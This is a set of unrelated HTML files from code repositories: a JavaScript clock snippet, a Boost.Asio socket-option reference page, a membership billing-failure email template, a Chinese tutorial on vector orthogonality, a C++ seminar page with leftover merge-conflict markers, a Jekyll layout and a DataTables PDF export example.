function showTime() {
var oDate = new Date();
var iHours = oDate.getHours();
var iMin = oDate.getMinutes();
var iSec = oDate.getSeconds();
var str = toTwo(iHours) + ':' + toTwo(iMin) + ':' + toTwo(iSec);
for (var i = 0; i < str.length; i++) {
aImage[i].src = (str.charAt(i) === ':') ? ('./img/colon.jpg') : ('./img/' + str.charAt(i) + '.jpg');
}
}
};
function toTwo(num) {
return num > 10 ? ('' + num) : ('0' + num);
}
</script>
</body>
</html> |
myodd/boost/libs/asio/doc/html/boost_asio/reference/basic_seq_packet_socket/do_not_route.html | FFMG/myoddweb.piger | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>basic_seq_packet_socket::do_not_route</title>
<link rel="stylesheet" href="../../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link rel="home" href="../../../index.html" title="Boost.Asio">
<link rel="up" href="../basic_seq_packet_socket.html" title="basic_seq_packet_socket">
<link rel="prev" href="debug.html" title="basic_seq_packet_socket::debug">
<link rel="next" href="enable_connection_aborted.html" title="basic_seq_packet_socket::enable_connection_aborted">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../boost.png"></td>
<td align="center"><a href="../../../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="debug.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../basic_seq_packet_socket.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="enable_connection_aborted.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="boost_asio.reference.basic_seq_packet_socket.do_not_route"></a><a class="link" href="do_not_route.html" title="basic_seq_packet_socket::do_not_route">basic_seq_packet_socket::do_not_route</a>
</h4></div></div></div>
<p>
<span class="emphasis"><em>Inherited from socket_base.</em></span>
</p>
<p>
<a class="indexterm" name="idm45465025423440"></a>
Socket option to prevent routing, use
local interfaces only.
</p>
<pre class="programlisting"><span class="keyword">typedef</span> <span class="identifier">implementation_defined</span> <span class="identifier">do_not_route</span><span class="special">;</span>
</pre>
<p>
Implements the SOL_SOCKET/SO_DONTROUTE socket option.
</p>
<h6>
<a name="boost_asio.reference.basic_seq_packet_socket.do_not_route.h0"></a>
<span class="phrase"><a name="boost_asio.reference.basic_seq_packet_socket.do_not_route.examples"></a></span><a class="link" href="do_not_route.html#boost_asio.reference.basic_seq_packet_socket.do_not_route.examples">Examples</a>
</h6>
<p>
Setting the option:
</p>
<pre class="programlisting"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">ip</span><span class="special">::</span><span class="identifier">udp</span><span class="special">::</span><span class="identifier">socket</span> <span class="identifier">socket</span><span class="special">(</span><span class="identifier">io_service</span><span class="special">);</span>
<span class="special">...</span>
<span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">socket_base</span><span class="special">::</span><span class="identifier">do_not_route</span> <span class="identifier">option</span><span class="special">(</span><span class="keyword">true</span><span class="special">);</span>
<span class="identifier">socket</span><span class="special">.</span><span class="identifier">set_option</span><span class="special">(</span><span class="identifier">option</span><span class="special">);</span>
</pre>
<p>
Getting the current option value:
</p>
<pre class="programlisting"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">ip</span><span class="special">::</span><span class="identifier">udp</span><span class="special">::</span><span class="identifier">socket</span> <span class="identifier">socket</span><span class="special">(</span><span class="identifier">io_service</span><span class="special">);</span>
<span class="special">...</span>
<span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">socket_base</span><span class="special">::</span><span class="identifier">do_not_route</span> <span class="identifier">option</span><span class="special">;</span>
<span class="identifier">socket</span><span class="special">.</span><span class="identifier">get_option</span><span class="special">(</span><span class="identifier">option</span><span class="special">);</span>
<span class="keyword">bool</span> <span class="identifier">is_set</span> <span class="special">=</span> <span class="identifier">option</span><span class="special">.</span><span class="identifier">value</span><span class="special">();</span>
</pre>
<h6>
<a name="boost_asio.reference.basic_seq_packet_socket.do_not_route.h1"></a>
<span class="phrase"><a name="boost_asio.reference.basic_seq_packet_socket.do_not_route.requirements"></a></span><a class="link" href="do_not_route.html#boost_asio.reference.basic_seq_packet_socket.do_not_route.requirements">Requirements</a>
</h6>
<p>
<span class="emphasis"><em>Header: </em></span><code class="literal">boost/asio/basic_seq_packet_socket.hpp</code>
</p>
<p>
<span class="emphasis"><em>Convenience header: </em></span><code class="literal">boost/asio.hpp</code>
</p>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2003-2016 Christopher
M. Kohlhoff<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="debug.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../basic_seq_packet_socket.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="enable_connection_aborted.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
wp-content/themes/wordpress-bootstrap/membership-email-billing_failure.html | oniiru/html | <html>
<body bgcolor="#d9d9d9" style="background-image:url(images/bodyBG.gif);background-repeat: repeat-y no-repeat;background-position: top center;background-color: #d9d9d9;margin:0;padding:0;color:#000000;font-size:15px;font-family:Arial, Helvetica, sans-serif;">
<div style="margin:0 auto; width:600px;">
<table cellspacing="0" cellpadding="0" border="0" >
<tr>
<td><a href="http://solidwize.com"><img src="http://solidwize.com/wp-content/themes/Karma-Child-Theme/images/emails/solidwizelogoemail.gif" width="600" height="87" alt=" " border="0" /></a></td>
</tr>
<tr>
<td style="padding:15px 20px 15px 20px; background:#fff;"><table width="100%" border="0" cellpadding="0" cellspacing="0">
</table></td>
</tr>
<tr>
<td style=" background:#fff;"><table width="100%" border="0"cellpadding="0" cellspacing="0">
</table></td>
</tr>
<tr>
<td style=" background:#fff;"><table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" style="padding:10px;font-size:14px">
Dear !!billing_name!!,
<p>The current subscription payment for your SolidWize membership has failed. <strong>Please click the following link to log in and update your billing information to avoid account suspension. <br><br>http://solidwize.com/login</strong></p>
<p>The most recent account information we have on file is:</p>
<p>!!billing_name!!</br />
!!billing_street!!<br />
!!billing_city!!, !!billing_state!! !!billing_zip!! !!billing_country!!
!!billing_phone!!
</p>
<p>
!!cardtype!!: !!accountnumber!!<br />
Expires: !!expirationmonth!!/!!expirationyear!!
</p>
If there is anything we can do to help, please let us know.
<Br><br>
All the best,
<br><br>
Andrew ONeal<br>
Co-Founder<br>
Solidwize.com<br>
408.656.3604
</td></tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr>
<td colspan="3"><table width="100%" border="0" cellpadding="0" cellspacing="0" style="float:left; width:600px; height:70px;background:#f4f4f4; text-align:center; font-size:24px;color:#222222;table-layout:auto">
<tr>
<td width="140"> </td>
<td width="180"><strong>Find Us Online</strong></td>
<td width="140"><a href="http://twitter.com/solidwize"><img src="http://solidwize.com/wp-content/themes/Karma-Child-Theme/images/emails/twitter.gif" width="32" height="32" alt=" " border="0" /></a> <a href="http://facebook.com/solidwize"><img src="http://solidwize.com/wp-content/themes/Karma-Child-Theme/images/emails/facebook.gif" width="32" height="32" alt=" " border="0" /></a> <a href="http://youtube.com/solidwize"><img src="http://solidwize.com/wp-content/themes/Karma-Child-Theme/images/emails/youtube.gif" width="32" height="32" alt=" " border="0" /></a></td>
<td width="140"> </td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td style="padding:20px 20px 50px 20px;"><p style="font-size:11px;color:#777777;line-height:19px;margin:0;padding:0" align="center"></p></td>
</tr>
</table>
</div>
</body>
</html>
|
linearAlgebra/matrix9.html | chenhuaizhen/chenhuaizhen.github.io | <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>正交 = 垂直?</title>
<link rel="shortcut icon" type="image/x-icon" href="../favicon.ico" />
<link rel="stylesheet" type="text/css" href="../css/main.css">
</head>
<body>
<div class='ctx'>
<h1 class="header">机器学习入门---线性代数篇</h1>
<div class='time'>
撰写:CHEN HUAIZHEN
<br/>
联系邮箱:1520498543@qq.com
<br/>
完成时间:2017-9-15
<br/>
</div>
<hr>
<h2 class="header">8. 正交 = 垂直?</h2>
<div class="box">
<div class="text">
首先讲下正交的定义,我们先来看下向量。向量的正交简单来讲就是当向量A与向量B内积为0时,A与B正交。即是说如果有向量A:
<br/><br/>
<div class="pic">
<img src="img/113.gif" style="border:none;"/>
</div>
<br/>
向量B:
<br/><br/>
<div class="pic">
<img src="img/114.gif" style="border:none;"/>
</div>
<br/>
它们的内积为0:
<br/><br/>
<div class="pic">
<img src="img/115.gif" style="border:none;"/>
</div>
<br/>
这时就说A与B正交。
<br/><br/>
看到这,相信很多人想起了垂直的概念,确实,两条向量垂直的条件也是内积为0,那么正交与垂直的区别在哪里?答案藏在了高维的空间里。
<br/><br/>
接下来推广到高维空间(不是现实中的高维空间,而是矩阵中的高维空间),两个空间A,B是正交的充要条件是A中的任意向量与B中的任意向量正交。这个条件很苛刻,一般是无法想象出来,只能靠计算才能得知,同时也是因为这个条件,所以正交跟垂直才有了本质上的区别。
<br/><br/>
举个例子,墙与地板是正交的么?答案是否定的。因为墙与地板相交于同一条向量,这条向量同时属于墙与地板,但这条向量肯定不能正交自己,所以墙与地板不是正交的。这时,是否感觉到了垂直于正交的区别。明显墙面是垂直于地板面的,因为之前高中数学有学过两个平面垂直的充要条件,就是一个平面上有一条向量(法向量)垂直于另一个平面即可。但是正交的要求是所有向量都得垂直于另一个平面,这就是区别所在。
<br/><br/>
那么再举个例子,墙上一条垂直于地板的向量于地板是正交的么?答案是肯定的。因为这条向量所构成的直线空间中,都正交与地板空间里的任意向量。
<br/><br/>
正交与垂直的区别说完了。再扯点别的吧,如何判断两个空间正交。定义已经给出,但还没论证过,为什么两向量内积为0就正交?
<br/><br/>
首先我们来到最熟悉的勾股定理,已知一直角三角形ABC:
<br/><br/>
<div class="pic">
<img src="img/116.jpg" style="border:none;"/>
</div>
<br/>
<br/><br/>
<div class="pic">
<img src="img/117.gif" style="border:none;"/>
</div>
<br/>
现在用向量来表示这个图:
<br/><br/>
<div class="pic">
<img src="img/118.jpg" style="border:none;"/>
</div>
<br/>
<br/><br/>
<div class="pic">
<img src="img/119.gif" style="border:none;"/>
</div>
<br/>
所以内积为0就代表两个向量垂直,也就是正交(因为正交是垂直的一种推广,但要切记两者是不一样的)。
<br/><br/>
换用我们之前学过的矩阵,其实内积也可以表示为矩阵的乘法:
<br/><br/>
<div class="pic">
<img src="img/120.gif" style="border:none;"/>
</div>
<br/>
所以向量正交也可以表示为:
<br/><br/>
<div class="pic">
<img src="img/121.gif" style="border:none;"/>
</div>
<br/>
这种形式的正交也可以用勾股定理证明:
<br/><br/>
<div class="pic">
<img src="img/118.jpg" style="border:none;"/>
</div>
<br/>
<br/><br/>
<div class="pic">
<img src="img/122.gif" style="border:none;"/>
</div>
<br/>
好了,有关正交的知识就暂且先告一段落,正交在矩阵尤其是机器学习中用处很多,这里只做基础介绍不展开讲,以后遇到相关问题再回头过来分析~~~下一章,讲讲<a href="matrix10.html">矩阵的四大子空间</a>。
</div><!--text-->
<br/><br/><br/><br/>
<hr>
<br/><br/>
<div class="pic">
<img src="../downBack.png" style="border:none;"/>
</div>
</div>
</div>
</body>
</html> |
Seminar_partIV.html | a-cellofan/BasicCpp | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="generator" content="pandoc" />
<title></title>
<style type="text/css">code{white-space: pre;}</style>
<link rel="stylesheet" href="/Users/Aurelius/Library/Mobile Documents/com~apple~CloudDocs/iWork/Queen_Mary/Lessons/SeminarC_Cpp/src/john-style.css" type="text/css" />
<link rel="stylesheet" href="/Users/Aurelius/Library/Mobile Documents/com~apple~CloudDocs/iWork/Queen_Mary/Lessons/SeminarC_Cpp/src/mio.css" type="text/css" />
</head>
<body>
<div id="TOC">
<ul>
<li><a href="#part-iv-statements-and-decision-making.">Part IV: Statements and decision making.</a><ul>
<li><a href="#introduction">Introduction</a></li>
<li><a href="#statements">Statements</a></li>
<li><a href="#program-flow-and-control-flow-statements.">Program Flow and control flow statements.</a></li>
<li><a href="#decision-making">Decision Making</a></li>
<li><a href="#practice">Practice</a></li>
<li><a href="#functional-programming">Functional programming</a></li>
</ul></li>
</ul>
</div>
<hr />
<p>author: Arturo Narros date: 11/02/2015 title: C/C++ Seminar subtitle: “Part IV: Statements and decision making”</p>
<hr />
<h1 id="part-iv-statements-and-decision-making.">Part IV: Statements and decision making.</h1>
<h2 id="introduction">Introduction</h2>
<p>You will learn:</p>
<blockquote>
<ul>
<li>What it is program <em>statement</em>.</li>
<li>What it is <em>program flow</em>.</li>
<li>Implement decision making in a program:
<ol style="list-style-type: decimal">
<li><strong>if</strong> structure.</li>
<li><strong>if-else</strong> structure.</li>
<li><strong>nested if-else</strong> structure.</li>
<li><strong>switch</strong> statement.</li>
<li><strong>switch</strong> is equivalent to <strong>nested If-else</strong>.</li>
</ol></li>
</ul>
</blockquote>
<h2 id="statements">Statements</h2>
<p>C++ statements are individual instructions of a program:</p>
<ol style="list-style-type: decimal">
<li>They all finished with a <strong>semicolon</strong> or <strong>;</strong>.</li>
<li>They are executed in the same order which they appear in the program.</li>
</ol>
<p>We have already seen several statements, for example:</p>
<ul>
<li><p>Variable declarations.</p>
<div class="auto">
<pre>
int x;
</pre>
</div></li>
<<<<<<< HEAD
<li><p>Output lines: <a href="Seminar_partII.html">std::cout/cout</a>.</p>
=======
<li><p>Output lines: <a href="seminar_partII.html">std::cout/cout</a>.</p>
>>>>>>> FETCH_HEAD
<div class="auto">
<pre>
cout << "x is 100";
</pre>
</div></li>
<<<<<<< HEAD
<li><p>Input lines: <a href="Seminar_partII.html">std::cin/cin</a>.</p>
=======
<li><p>Input lines: <a href="seminar_partII.html">std::cin/cin</a>.</p>
>>>>>>> FETCH_HEAD
<div class="auto">
<pre>
cin >> x ;
</pre>
</div></li>
<<<<<<< HEAD
<li><p><a href="Seminar_partIII.html">Casting</a></p>
=======
<li><p><a href="seminar_partIII.html">Casting</a></p>
>>>>>>> FETCH_HEAD
<div class="auto">
<pre>
int var = (int) floatvar;
</pre>
</div></li>
<<<<<<< HEAD
<li><p>Algebraical expressions: any line that involves <a href="Seminar_partIII.html">algebraical operators</a></p>
=======
<li><p>Algebraical expressions: any line that involves <a href="seminar_partIII.html">algebraical operators</a></p>
>>>>>>> FETCH_HEAD
<div class="auto">
<pre>
C = A + B ;
</pre>
</div></li>
<<<<<<< HEAD
<li><p>Logical expressions: any line that involves <a href="Seminar_partIII.html">logical operators</a>.</p>
=======
<li><p>Logical expressions: any line that involves <a href="seminar_partIII.html">logical operators</a>.</p>
>>>>>>> FETCH_HEAD
<div class="auto">
<pre>
A > B ;
</pre>
</div></li>
</ul>
<h2 id="program-flow-and-control-flow-statements.">Program Flow and control flow statements.</h2>
<p>A program can be defined as ordered execution of several computer statements. The execution order is given by the location in the program from the top to the button.</p>
<p>Control flow statements allows to prevent (Decision making) or repeat (Loop statements) execution of certain ones.</p>
<p>Here you can see two <em>program flow diagrams</em> from a very basic programs:</p>
<div class="figure">
<img src="fig/program_flow.png" />
</div>
<p>Can you interpret them?</p>
<h2 id="decision-making">Decision Making</h2>
<ul>
<li><p><em>if ( condition ) statement;</em> : In case the condition is false, the statement is not executed.</p>
<div class="auto">
<pre>
if (m == 18)
cout << "m is = 18";
</pre>
</div></li>
<li><p><em>if ( condition ) { statement 1; statement 2;}</em> : If you want to execute several statements under the same condition you need braces (<em>{}</em>). For example:</p>
<div class="auto">
<pre>
if (m == 18)
{
cout << "m is ";
cout << m;
}
</pre>
</div></li>
<li><p><em>if ( condition ) statement 1; else statement 2;</em> : You want to execute a single statement if condition is <em>true</em>, otherwise statement2 is executed . In case you want to group several statements under the same condition you need keys, for example:</p>
<div class="auto">
<pre>
if (m == 18)
{
cout << "m is 18";
cout << "You are an adult person";
}
else
cout << "m is not 18";
</pre>
</div></li>
<li><p><em>Nested if conditions</em> : You can combine <em>if(){}else{}</em> structures as for example:</p>
<div class="auto">
<pre>
if (m > 0)
cout << "m is positive";
else if (m < 0)
cout << "m is negative";
else
cout << "m is 0";
</pre>
</div></li>
<li><p><em>switch</em> : Similar to <em>nested if-else</em>, is used whenever a variable gets a constant value: Switch syntax is:</p>
<div class="auto">
<pre>
switch (expression)
{
case constant1:
group-of-statements-1;
break;
case constant2:
group-of-statements-2;
break;
.
.
.
default:
default-group-of-statements
}
</pre>
</div>
<p>An example is:</p>
<div class="auto">
<pre>
switch (x) {
case 1:
case 2:
case 3:
cout << "x is 1, 2 or 3";
break;
default:
cout << "x is not 1, 2 nor 3";
}
</pre>
</div></li>
</ul>
<h2 id="practice">Practice</h2>
<p><strong>EXERCISE 1</strong>: Please, create a new project (p8?) in the workspace and copy the source code of <a href="src/decision_making.cpp">decision_making.cpp file</a> on to the new main.cpp file:</p>
<ul>
<li>Read carefully the statements of the programme.</li>
<li>Try to understand what is the possible output as a function of the possible input.</li>
</ul>
<p>Here there is a scheme that might be useful to understand this program.</p>
<div class="figure">
<img src="fig/sch_dm1.png" />
</div>
<ul>
<li>Is there something missing in your opinion?</li>
</ul>
<p><strong>EXERCISE 2</strong>: Please, create a new project (p9?) in the workspace and copy the source code of <a href="src/decision_making2.cpp">decision_making2.cpp file</a> on to the new main.cpp file:</p>
<ul>
<li>Read carefully the statements of the programme.</li>
<li>Try to understand what is the possible output as a function of the possible input.</li>
</ul>
<p>Here there is a scheme that might be useful to understand this program.</p>
<div class="figure">
<img src="fig/sch_dm2.png" />
</div>
<ul>
<li>What should be the code in case you want to have a second opportunity to the programme user?</li>
</ul>
<p><strong>EXERCISE 3</strong>: Please, create a new project (p10?) in the workspace and copy the source code of <a href="src/decision_making3.cpp">decision_making3.cpp file</a> on to the new main.cpp file:</p>
<ul>
<li>Read carefully the statements of the programme.</li>
<li>Try to understand what is the possible output as a function of the possible input.</li>
</ul>
<p>Here there is a scheme that might be useful to understand this program.</p>
<div class="figure">
<img src="fig/sch_dm3.png" />
</div>
<ul>
<li>What will happen if the input in line 32 is not a text but a number?</li>
<li>How will you change it in order to prevent such case?</li>
</ul>
<p><strong>EXERCISE 4</strong>: Please, create a new project (p10?) in the workspace and copy the source code of <a href="src/decision_making4.cpp">decision_making4.cpp file</a> on to the new main.cpp file:</p>
<ul>
<li>Read carefully the statements of the programme.</li>
<li>Try to understand what is the possible output as a function of the possible input.</li>
</ul>
<p>Here there is a scheme that might be useful to understand this program.</p>
<div class="figure">
<img src="fig/sch_dm4.png" />
</div>
<ul>
<li>Can you be even more specific, for example, in line 77 the answer can be not a number… How can you change the code in order to prevent this case?</li>
<li>Can you think in other cases when the programme might not work?</li>
</ul>
<p><strong>EXERCISE 5</strong>: Please, create a new project (p11?) in the workspace and copy the source code of <a href="src/decision_making5.cpp">decision_making5.cpp file</a> on to the new main.cpp file:</p>
<ul>
<li>Read carefully the statements of the programme.</li>
<li>Try to understand what is the possible output as a function of the possible input.</li>
</ul>
<p>Here there is a scheme that might be useful to understand this program.</p>
<div class="figure">
<img src="fig/sch_dm5.png" />
</div>
<ul>
<li>Switch-statement can be easily transformed in a nested if-else statement. Can you please do it?</li>
</ul>
<<<<<<< HEAD
<h2 id="functional-programming">Functional programming</h2>
<p>Here you can compare the different schemes about decision making of exercises 1,2,3,4 and 5. There are some blocks from the diagrams that are identical but something additional… Imagine you can take such parts and use them in any program that requires it. This is the idea of functional in programming.</p>
<div class="figure">
<img src="fig/sch_dm6.png" />
</div>
<p>In this scheme you have dashed lines to group similar parts of the program, i.e., similar code that has similar <strong>functionality</strong>.</p>
=======
<p><strong>EXERCISE 6</strong>: Here you can compare the different schemes about decision making of exercises 1,2,3,4 and 5. There are some blocks of the diagrams that are identical but something additional… Imagine you can take such parts and use them in any program that require…. This is the idea of functional in programming.</p>
<p>In this scheme you have dashed lines to group similar parts of the program, i.e., similar code that has similar <strong>functionality</strong>.</p>
<div class="figure">
<img src="fig/sch_dm6.png" />
</div>
>>>>>>> FETCH_HEAD
<p>================================================================================</p>
<ul>
<li>
<a href="index.html">Home</a>
</li>
<li>
<<<<<<< HEAD
<a href="Seminar_partI.html">Part I</a>
</li>
<li>
<a href="Seminar_partII.html">Part II</a>
</li>
<li>
<a href="Seminar_partIII.html">Part III</a>
=======
<a href="seminar_partI.html">Part I</a>
</li>
<li>
<a href="seminar_partII.html">Part II</a>
</li>
<li>
<a href="seminar_partIII.html">Part III</a>
>>>>>>> FETCH_HEAD
</li>
</ul>
</body>
</html>
|
_layouts/post.html | 28circle/28circle.github.io | ---
layout: layout
---
<div class="post">
<header class="post-header">
<span itemprop="name"><h1 class="post-title"><center>{{ page.title }}</center></h1></span>
<p class="post-meta"><center>{{ page.date | date: "%-d %b %Y" }}{% if page.meta %} • {{ page.meta }}{% endif %}</center></p>
</header>
<article class="post-content">
{{ content }}
</article>
</div>
|
default/public/plugins/datatables/extensions/TableTools/examples/pdf_message.html | slrondon/WispCenter | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<link rel="shortcut icon" type="image/ico" href="http://www.datatables.net/favicon.ico">
<meta name="viewport" content="initial-scale=1.0, maximum-scale=2.0">
<title>TableTools example - PDF message</title>
<link rel="stylesheet" type="text/css" href="../../../media/css/jquery.dataTables.css">
<link rel="stylesheet" type="text/css" href="../css/dataTables.tableTools.css">
<link rel="stylesheet" type="text/css" href="../../../examples/resources/syntax/shCore.css">
<link rel="stylesheet" type="text/css" href="../../../examples/resources/demo.css">
<style type="text/css" class="init">
</style>
<script type="text/javascript" language="javascript" src="../../../media/js/jquery.js"></script>
<script type="text/javascript" language="javascript" src="../../../media/js/jquery.dataTables.js"></script>
<script type="text/javascript" language="javascript" src="../js/dataTables.tableTools.js"></script>
<script type="text/javascript" language="javascript" src="../../../examples/resources/syntax/shCore.js"></script>
<script type="text/javascript" language="javascript" src="../../../examples/resources/demo.js"></script>
<script type="text/javascript" language="javascript" class="init">
$(document).ready(function() {
$('#example').DataTable( {
dom: 'T<"clear">lfrtip',
tableTools: {
"aButtons": [
"copy",
"csv",
"xls",
{
"sExtends": "pdf",
"sPdfOrientation": "landscape",
"sPdfMessage": "Your custom message would go here."
},
"print"
]
}
} );
} );
</script>
</head>
<body class="dt-example">
<div class="container">
<section>
<h1>TableTools example <span>PDF message</span></h1>
<div class="info">
<p>This example shows how you can add a message to the saved PDF using the <code>sPdfMessage</code> parameter. It also shows that the orientation of the output PDF
can be changed to landscape which is useful if you have a lot of columns.</p>
</div>
<table id="example" class="display" cellspacing="0" width="100%">
<thead>
<tr>
<th>Name</th>
<th>Position</th>
<th>Office</th>
<th>Age</th>
<th>Start date</th>
<th>Salary</th>
</tr>
</thead>
<tfoot>
<tr>
<th>Name</th>
<th>Position</th>
<th>Office</th>
<th>Age</th>
<th>Start date</th>
<th>Salary</th>
</tr>
</tfoot>
<tbody>
<tr>
<td>Tiger Nixon</td>
<td>System Architect</td>
<td>Edinburgh</td>
<td>61</td>
<td>2011/04/25</td>
<td>$320,800</td>
</tr>
<tr>
<td>Garrett Winters</td>
<td>Accountant</td>
<td>Tokyo</td>
<td>63</td>
<td>2011/07/25</td>
<td>$170,750</td>
</tr>
<tr>
<td>Ashton Cox</td>
<td>Junior Technical Author</td>
<td>San Francisco</td>
<td>66</td>
<td>2009/01/12</td>
<td>$86,000</td>
</tr>
<tr>
<td>Cedric Kelly</td>
<td>Senior Javascript Developer</td>
<td>Edinburgh</td>
<td>22</td>
<td>2012/03/29</td>
<td>$433,060</td>
</tr>
<tr>
<td>Airi Satou</td>
<td>Accountant</td>
<td>Tokyo</td>
<td>33</td>
<td>2008/11/28</td>
<td>$162,700</td>
</tr>
<tr>
<td>Brielle Williamson</td>
<td>Integration Specialist</td>
<td>New York</td>
<td>61</td>
<td>2012/12/02</td>
<td>$372,000</td>
</tr>
<tr>
<td>Herrod Chandler</td>
<td>Sales Assistant</td>
<td>San Francisco</td>
<td>59</td>
<td>2012/08/06</td>
<td>$137,500</td>
</tr>
<tr>
<td>Rhona Davidson</td>
<td>Integration Specialist</td>
<td>Tokyo</td>
<td>55</td>
<td>2010/10/14</td>
<td>$327,900</td>
</tr>
<tr>
<td>Colleen Hurst</td>
<td>Javascript Developer</td>
<td>San Francisco</td>
<td>39</td>
<td>2009/09/15</td>
<td>$205,500</td>
</tr>
<tr>
<td>Sonya Frost</td>
<td>Software Engineer</td>
<td>Edinburgh</td>
<td>23</td>
<td>2008/12/13</td>
<td>$103,600</td>
</tr>
<tr>
<td>Jena Gaines</td>
<td>Office Manager</td>
<td>London</td>
<td>30</td>
<td>2008/12/19</td>
<td>$90,560</td>
</tr>
<tr>
<td>Quinn Flynn</td>
<td>Support Lead</td>
<td>Edinburgh</td>
<td>22</td>
<td>2013/03/03</td>
<td>$342,000</td>
</tr>
<tr>
<td>Charde Marshall</td>
<td>Regional Director</td>
<td>San Francisco</td>
<td>36</td>
<td>2008/10/16</td>
<td>$470,600</td>
</tr>
<tr>
<td>Haley Kennedy</td>
<td>Senior Marketing Designer</td>
<td>London</td>
<td>43</td>
<td>2012/12/18</td>
<td>$313,500</td>
</tr>
<tr>
<td>Tatyana Fitzpatrick</td>
<td>Regional Director</td>
<td>London</td>
<td>19</td>
<td>2010/03/17</td>
<td>$385,750</td>
</tr>
<tr>
<td>Michael Silva</td>
<td>Marketing Designer</td>
<td>London</td>
<td>66</td>
<td>2012/11/27</td>
<td>$198,500</td>
</tr>
<tr>
<td>Paul Byrd</td>
<td>Chief Financial Officer (CFO)</td>
<td>New York</td>
<td>64</td>
<td>2010/06/09</td>
<td>$725,000</td>
</tr>
<tr>
<td>Gloria Little</td>
<td>Systems Administrator</td>
<td>New York</td>
<td>59</td>
<td>2009/04/10</td>
<td>$237,500</td>
</tr>
<tr>
<td>Bradley Greer</td>
<td>Software Engineer</td>
<td>London</td>
<td>41</td>
<td>2012/10/13</td>
<td>$132,000</td>
</tr>
<tr>
<td>Dai Rios</td>
<td>Personnel Lead</td>
<td>Edinburgh</td>
<td>35</td>
<td>2012/09/26</td>
<td>$217,500</td>
</tr>
<tr>
<td>Jenette Calmkcell</td>
<td>Development Lead</td>
<td>New York</td>
<td>30</td>
<td>2011/09/03</td>
<td>$345,000</td>
</tr>
<tr>
<td>Yuri Berry</td>
<td>Chief Marketing Officer (CMO)</td>
<td>New York</td>
<td>40</td>
<td>2009/06/25</td>
<td>$675,000</td>
</tr>
<tr>
<td>Caesar Vance</td>
<td>Pre-Sales Support</td>
<td>New York</td>
<td>21</td>
<td>2011/12/12</td>
<td>$106,450</td>
</tr>
<tr>
<td>Doris Wilder</td>
<td>Sales Assistant</td>
<td>Sidney</td>
<td>23</td>
<td>2010/09/20</td>
<td>$85,600</td>
</tr>
<tr>
<td>Angelica Ramos</td>
<td>Chief Executive Officer (CEO)</td>
<td>London</td>
<td>47</td>
<td>2009/10/09</td>
<td>$1,200,000</td>
</tr>
<tr>
<td>Gavin Joyce</td>
<td>Developer</td>
<td>Edinburgh</td>
<td>42</td>
<td>2010/12/22</td>
<td>$92,575</td>
</tr>
<tr>
<td>Jennifer Chang</td>
<td>Regional Director</td>
<td>Singapore</td>
<td>28</td>
<td>2010/11/14</td>
<td>$357,650</td>
</tr>
<tr>
<td>Brenden Wagner</td>
<td>Software Engineer</td>
<td>San Francisco</td>
<td>28</td>
<td>2011/06/07</td>
<td>$206,850</td>
</tr>
<tr>
<td>Fiona Green</td>
<td>Chief Operating Officer (COO)</td>
<td>San Francisco</td>
<td>48</td>
<td>2010/03/11</td>
<td>$850,000</td>
</tr>
<tr>
<td>Shou Itou</td>
<td>Regional Marketing</td>
<td>Tokyo</td>
<td>20</td>
<td>2011/08/14</td>
<td>$163,000</td>
</tr>
<tr>
<td>Michelle House</td>
<td>Integration Specialist</td>
<td>Sidney</td>
<td>37</td>
<td>2011/06/02</td>
<td>$95,400</td>
</tr>
<tr>
<td>Suki Burks</td>
<td>Developer</td>
<td>London</td>
<td>53</td>
<td>2009/10/22</td>
<td>$114,500</td>
</tr>
<tr>
<td>Prescott Bartlett</td>
<td>Technical Author</td>
<td>London</td>
<td>27</td>
<td>2011/05/07</td>
<td>$145,000</td>
</tr>
<tr>
<td>Gavin Cortez</td>
